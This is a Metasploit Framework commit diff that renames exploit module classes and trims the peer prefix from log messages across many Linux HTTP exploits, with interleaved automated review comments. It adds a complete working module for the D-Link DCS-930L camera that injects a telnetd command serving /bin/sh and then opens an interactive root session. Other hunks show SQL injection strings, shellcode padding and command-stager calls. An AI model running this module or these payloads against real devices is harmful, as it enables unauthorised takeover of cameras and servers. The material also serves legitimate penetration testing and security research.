+++ b/modules/exploits/linux/http/belkin_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -78,13 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200 diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 417e2e6d14..e6c17a5254 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") random_id = rand_text_numeric(5 + rand(8)) random_char = rand_text_alphanumeric(1) session_injection = "#{random_id}' or '#{random_char}'='#{random_char}" diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb index 27d546f05b..a63ef51506 100644 --- a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 0b43b461ad..36fdc4841d 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /DD-WRT/ ] } diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index e345dc28a1..7b1cbbb6d3 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -74,13 +74,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb index accdee0cdb..9e52b2400d 100644 --- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index bca4beed87..588b4e8675 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -72,15 +72,15 @@ class Metasploit4 < Msf::Exploit::Remote )) unless res - vprint_status("#{peer} - The connection timed out.") + vprint_status("The connection timed out.") return Exploit::CheckCode::Unknown end if res.code && res.code == 404 - vprint_status("#{peer} - uploadfile.htm does not exist") + vprint_status("uploadfile.htm does not exist") return Exploit::CheckCode::Safe elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/ return Exploit::CheckCode::Vulnerable @@ -101,7 +101,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Payload uploaded successfully") + print_good("Payload uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") end 
@@ -117,7 +117,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Stager uploaded successfully") + print_good("Stager uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager") end @@ -140,7 +140,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 401 fail_with(Failure::NoAccess, "#{peer} - Authentication failed") elsif res.code && res.code == 200 && res.body - print_good("#{peer} - Payload executed successfully") + print_good("Payload executed successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed") end @@ -169,9 +169,9 @@ rm -f /tmp/tmpchpw EOF res = upload('/sbin/chpasswd.sh', chpasswd) if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully") + vprint_good("Restored /sbin/chpasswd.sh successfully") else - vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default") + vprint_warning("Could not restore /sbin/chpasswd.sh to default") end end @@ -179,7 +179,7 @@ EOF # Upload a file to a specified path # def upload(path, data) - vprint_status("#{peer} - Writing #{data.length} bytes to #{path}") + vprint_status("Writing #{data.length} bytes to #{path}") boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb new file mode 100644 index 0000000000..204c28565a --- /dev/null +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb 
@@ -0,0 +1,158 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + include Msf::Exploit::Remote::Telnet + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DCS-930L Authenticated Remote Command Execution', + 'Description' => %q{ + The D-Link DCS-930L Network Video Camera is vulnerable + to OS Command Injection via the web interface. The vulnerability + exists at /setSystemCommand, which is accessible with credentials. + This vulnerability was present in firmware version 2.01 and fixed + by 2.12. + }, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Dec 20 2015', + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']) + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def telnet_timeout + (datastore['TelnetTimeout'] || 10) + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25) + end + + def exploit + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] || '' + + test_login(user, pass) + exploit_telnet + end + + def test_login(user, pass) + print_status("#{peer} - Trying to login with #{user} : #{pass}") + + res 
= send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user, pass) + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200 + + print_good("#{peer} - Successful login #{user} : #{pass}") + end + + def exploit_telnet + telnet_port = rand(32767) + 32768 + + print_status("#{peer} - Telnet Port: #{telnet_port}") + + cmd = "telnetd -p #{telnet_port} -l/bin/sh" + + telnet_request(cmd) + + print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...") + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout }) + + if sock.nil? + fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable") + end + + add_socket(sock) + + print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...") + prompt = negotiate_telnet(sock) + + if prompt.nil? 
+ sock.close + fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{telnet_port} - Telnet session successfully established") + end + + handler(sock) + end + + def telnet_request(cmd) + uri = '/setSystemCommand' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'vars_post' => { + 'ReplySuccessPage' => 'docmd.htm', + 'ReplyErrorPage' => 'docmd.htm', + 'SystemCommand' => cmd, + 'ConfigSystemCommand' => 'Save' + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def negotiate_telnet(sock) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, telnet_timeout) + return nil if not data or data.length == 0 + if data =~ /BusyBox/ + return true + end + end + end + rescue ::Timeout::Error + return nil + end + end +end diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb index d9a1f0ef17..7f4eedea14 100644 --- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb index 4470db0325..603be9dcc2 100644 --- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb +++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
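Review bot: `test_login` and `exploit_telnet` in this new module still build messages as `"#{peer} - ..."` while every other file in this commit drops that prefix, so the output will presumably carry the peer twice if the framework now adds it; write `print_good("Successful login #{user} : #{pass}")` and likewise for the other `#{peer}` calls (the `#{rhost}:#{telnet_port}` messages name a different port and can stay). The `fail_with` text in `test_login` ends with `(response code: #{res.code}` and is missing its closing parenthesis. `exploit_telnet` starts `telnetd` with `-l/bin/sh` on the device and no method here stops it, so the Description should say that the listener is left running on the camera after the session ends. The class also declares no `Rank`, unlike the neighbouring modules in this diff, which looks like an omission worth confirming.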
diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 14d871d2b0..836f6091b3 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Because only has been tested on a QEMU emulated environment HttpFingerprint = { :pattern => [ /Boa/ ] } @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote shellcode << rand_text(0x1c) # filler shellcode << payload.encoded # shellcode - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb index c2b8c13e31..e0edc210c1 100644 --- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb +++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index 66ea232ee9..a6957b0115 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb +++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient 
@@ -73,20 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") @counter = 1 execute_cmdstager( :flavor => :echo, :linemax => 95 # limited by our upload, larger payloads crash the web server ) - print_status("#{peer} - creating payload and executing it ...") + print_status("creating payload and executing it ...") (1 .. @counter).each do |act_file| # the http server blocks access to our files ... we copy it to a new one diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 2fe19360ba..9327460abf 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index e455b14a64..f58e7ef41c 100644 
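Review bot: The `fail_with` call in `exploit` (dlink_dspw110_cookie_noauth_exec.rb, hunk -73,20) still interpolates `#{peer} - ` while every `print_status` around it drops the prefix, so the two kinds of message now follow different formatting rules. If the failure text is later emitted through the same prefixed printer (not visible here), the address would appear twice on one line. I would change it to `fail_with(Failure::Unknown, 'Failed to access the vulnerable device')`, or add a comment explaining why `fail_with` keeps the prefix. The same leftover appears in the `exploit` hunks of dlink_dspw215_info_cgi_bof.rb, dlink_hedwig_cgi_bof.rb, dlink_hnap_bof.rb and most other modules in this diff; `exploit` continues outside this hunk.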
--- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 62f500e8eb..1e152c7bb3 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index 0f001df572..c6e14ef89a 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb 
+++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index fc89dd0e39..396e03d2d5 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 1513892d77..599c0ae82c 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -117,26 +117,26 @@ class Metasploit3 < Msf::Exploit::Remote @uri.path << "/" if @uri.path[-1, 1] != "/" peer = "#{rhost}:#{rport}" - print_status("#{peer} - Getting the sid and token...") + print_status("Getting the sid and token...") sid, token = get_sid_token if sid.nil? - print_error("#{peer} - Unable to retrieve a session ID") + print_error("Unable to retrieve a session ID") return elsif token.nil? - print_error("#{peer} - Unable to retrieve a token") + print_error("Unable to retrieve a token") return end user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with \"#{user}:#{pass}\"") + print_status("Attempt to login with \"#{user}:#{pass}\"") success = login(sid, token) if not success - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@uri.path, "admin/tools/export.php"), diff --git a/modules/exploits/linux/http/dreambox_openpli_shell.rb b/modules/exploits/linux/http/dreambox_openpli_shell.rb index b788d79503..0f79eb3ee7 100644 --- a/modules/exploits/linux/http/dreambox_openpli_shell.rb +++ b/modules/exploits/linux/http/dreambox_openpli_shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/efw_chpasswd_exec.rb b/modules/exploits/linux/http/efw_chpasswd_exec.rb index dc3a532f2f..870881ba4d 100644 --- a/modules/exploits/linux/http/efw_chpasswd_exec.rb +++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb 
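Review bot: The local `peer = "#{rhost}:#{rport}"` at the top of the dolibarr_cmd_exec.rb hunk -117,26 is no longer read by any line the hunk shows, because each `print_status`/`print_error` dropped `#{peer}`. If nothing past the hunk uses it, delete the assignment; a local named `peer` also hides the helper of the same name that other modules in this diff call without defining one. esva_exec.rb keeps the same leftover in its `exploit`. Separately, `print_status("Attempt to login with \"#{user}:#{pass}\"")` writes the configured password to the console and to any spooled log, and printing only `user` would be enough. The method starts and ends outside the hunk.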
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index de1a4d8942..3e812db793 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'GET', 'uri' => "/cgi-bin/learn-msg.cgi", @@ -84,12 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably something is wrong if not res or res.code != 200 or res.body !~ /meta http-equiv="refresh" content="0;URL=\/learned.html"/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end - print_good("#{peer} - Command executed successfully") - print_status("#{peer} - Output: \n#{res.body.split("Learned tokens")[0]}") + print_good("Command executed successfully") + print_status("Output: \n#{res.body.split("Learned tokens")[0]}") end end diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb index dbb7f728db..a7fa0234a7 100644 --- a/modules/exploits/linux/http/f5_icall_cmd.rb +++ b/modules/exploits/linux/http/f5_icall_cmd.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index a62532c29a..05a1ad2591 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb index dff154782b..554c48b12f 100644 --- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb +++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index acb764be06..8f634e376a 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -101,13 +101,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( flavor: :echo, linemax: 92 diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 2c4caca16b..64a57f904f 100644 --- a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 1a1b961b1c..c29ee861d9 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index a7ca3d7d9b..112999f051 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } 
@@ -115,14 +115,14 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") @josso_id = get_josso_token if @josso_id.nil? fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") end - print_good("#{peer} - Authentication successful") + print_good("Authentication successful") - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") execute_command(payload.encoded) end end diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index 5ebaca92ab..b478063baa 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index e3c2a9b4a8..b041765530 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper 
